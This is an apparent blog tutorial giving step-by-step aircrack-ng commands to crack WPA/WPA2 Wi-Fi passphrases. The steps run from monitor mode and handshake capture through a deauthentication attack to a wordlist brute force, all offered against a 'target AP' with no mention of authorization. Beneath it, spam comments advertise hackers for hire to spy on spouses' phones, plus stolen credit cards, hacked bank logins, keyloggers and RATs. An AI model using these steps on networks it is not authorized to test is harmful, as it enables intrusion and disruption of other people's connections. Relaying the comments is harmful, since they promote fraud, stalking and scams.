Monday 17 August 2015

WIFI Hacking : Cracking WPA/WPA2 using Aircrack-ng

Welcome Back my blooming Hackers !  :)

Today i'll show you how to hack WPA/WPA-2 wifi pass phrases using aircrack-ng suite. Aircrack-ng suite comes pr-installed in Kali Linux. You can see my extensive guide on how to set up Kali Linux.

In this attack we try to capture the 4-WAY HANDSHAKE which takes place during the authentication of any user when they try to connect to WPA/WPA2 secured AP. And, then perform a BRUTEFORCE attack on this captured 4-WAY HANDSHAKE.

So lets get started now and get our hands DiRtY ! XD

STEP #1

First of all, we have to put our wireless card in monitor mode. This will enable our wireless card to capture packets coming to and from all the AP's (Access Points) in our proximity.

We will use airmon-ng to put our wireless card in monitor mode.

Type iwconfig to know the name of the your wireless interface.


Mine's is wlan0.

Now type airmon-ng start wlan0  (in my case)  in the terminal. This will put wireless interface card in monitor mode.














Take note of your wireless interface name, mine is wlan0mon (highlighted in the image above) .

STEP #2

Now we need to find all the AP's in our proximity. For this purpose we will use airodump-ng.

Type airodump-ng <monitor mode interface name>  (Without <> ).
In my case :-  airodump-ng wlan0mon 
You will get an output something like this.










Take note of the BSSID and the Channel (CH) of the target AP.

STEP #3

Now we will capture the packets sent to and from the our target AP.

Type :- airodump-ng --bssid <BSSID of tagret AP> -c <Channel on which your AP is working on> --write <Name of the file you want to save 4-WAY HANDSHAKE to> <monitor mode interface name>

For eg:- airodump-ng --bssid **:**:**:**:**:** -c 1 --write tutorial wlan0mon















STEP #4

In this step we will perform a De-authentication attack on the AP and try to capture the 4-WAY HANDSHAKE between the AP and the user when it tries to reconnect to the AP after the De-auth. attack.

Open a new terminal window **DO NOT CLOSE THE CURRENT TERMINAL WINDOW** and type :

aireplay-ng --deauth 100 -a <BSSID OF TARGET> <MONITOR MODE INTERFACE NAME> 

After hitting enter your wireless card will send DE-authentication packets to the AP. 
















STEP #5

Switch back to the first terminal in which we ran the airodump-ng command.

At the top right corner you will get the message if you are successful in capturing the 4-WAY HANDSHAKE.















STEP #6

Now we will do a brute force attack on the handshake we have captured.

For this we will use aircrack-ng. Type:

aircrack-ng -w <Wordlist Location> <.cap file in which handshake is saved>

There are some wordlists which come in Kali Linux in the directory :- /usr/share/wordlists


For eg:-

aircrack-ng -w /usr/share/wordlists/rockyou tutorial-01.cap




















Now sit back, Relax and let aircrack do rest of the work. :P

This attack may take as much time as days weeks or even months to crack a pass phrase depending upon the complexity of the pass phrase used.

That's all for this tutorial.

Keep coming back for more.

And yes, Keep Hacking Keep Defending. XD XD
 

10 comments :
Write comments
  1. Should you ever require the services of a hacker, i implore you to try your very best to hire only professionals. . i was able to hire the services of an elite, asides the fact that i was provided a permanent solution to the service he rendered me, but he gave a very efficient customer experience. he carried me along with every process and didnt leave me in the dark. (cyberblasst@gmail.com) is the only trusted hacker i can boldly recommend, he helped me hack into his phone and social media accounts and the whole thing was exposed at a little cost. I and my friends have used him quite a number of times and he never disappoints..

    ReplyDelete
  2. Straight and quick, are you suspecting an affair between your husband and his coworkers ? If yes and you need to view certain information such as whatsapp chats, Facebook messages Recover deleted files.He never disappointed me .CONTACT NAME MAKING THIS COMMENT

    ReplyDelete
  3. Honestly speaking, getting a genuine hacker is very rare... but my classmates Corporation has assembled the finest hackers in London, Texas and mostly his Cambridge colleagues .They show proof of their authenticity. Contact them at jamiehacking99 (AT) gmail (DOT) com

    ReplyDelete
  4. Hello all
    am looking few years that some guys comes into the market
    they called themselves hacker, carder or spammer they rip the
    peoples with different ways and it’s a badly impact to real hacker
    now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
    Anyone want to make deal with me any type am available but first
    I‘ll show the proof that am real then make a deal like

    Available Services

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7

    fixitrogers@gmail.com

    ReplyDelete

  5. Available Services

    ..crack any wifi password

    ..paypal money adder

    ..bitcoin miner ultimate

    ..hack bank account

    ..payza money adder

    ..jtr password cracker

    ..neteller money adder

    ..payoneer money adder

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7
    putro9111@gmail.com

    ReplyDelete
  6. ❤ BUSINESS FOR
    SERIOUS BUYERS ONLY ❤

    ♣ BILLS PAY
    ♣ HOTEL BOOKING / AIR TICKET BOOKING
    ♣ BANK TRANSFER AVAILABLE
    ♣ WESTERN UNION TRANSFER AVAILABLE
    ♣ ATM / DUMPS / TRACKS
    ♣ CREDIT CARD / DEBIT CARD

    We Also provide You To Transfer Money From any Hacked Bank Logins With No ChargeBack.
    WE HAVE REPLACEMENT POLICY AND WE PROVE BEFORE ANY BUSINESS
    INBOX ME ASAP

    ICQ : 728612475
    Gmail : arturooboris@gmail.com

    ReplyDelete
  7. Hola chicos,
    ¿Alguna vez has necesitado un experto en piratería? ¿Alguna vez has querido hackear la cuenta de correo de alguien? RECUPERAR CUENTAS PERDIDAS, grado escolar, ¿aumentar puntaje de crédito?
    Básicamente, creo que no todos tenemos que enfrentar todo este engaño y las mentiras de nuestro cónyuge en un caso mío. Cuando me enfermé y me cansé de todas las mentiras y engaños, tuve que contactar a un amigo mío para que me contactara. Uno de los mejores hackers en los estados.
    Luego conocí a Herbert West. Me salvó de las mentiras de mi infiel marido al piratear su teléfono. En caso de que necesite ayuda para piratear cualquier teléfono o cuenta u otros trabajos, póngase en contacto con él (cyberhackspy01@GMAIL.COM). Número: +1 (518) -217-5690.
    Él te ayudará

    ReplyDelete
  8. I don't panic for any reason when it comes to spyexpert0@gmail.com because am very sure of results........

    ReplyDelete
  9. hi everyone kindly reach out to (ethan spy world) they are the best when it comes to online hacking, they helped me in the past when i did suspect my partner was cheating on me , and I find this very helpful, so I strongly recommend anyone to this group for any issues related to hack, do reach out through web @: (ethanspyworld.com)
    get in touch and you will be glad you did .

    ReplyDelete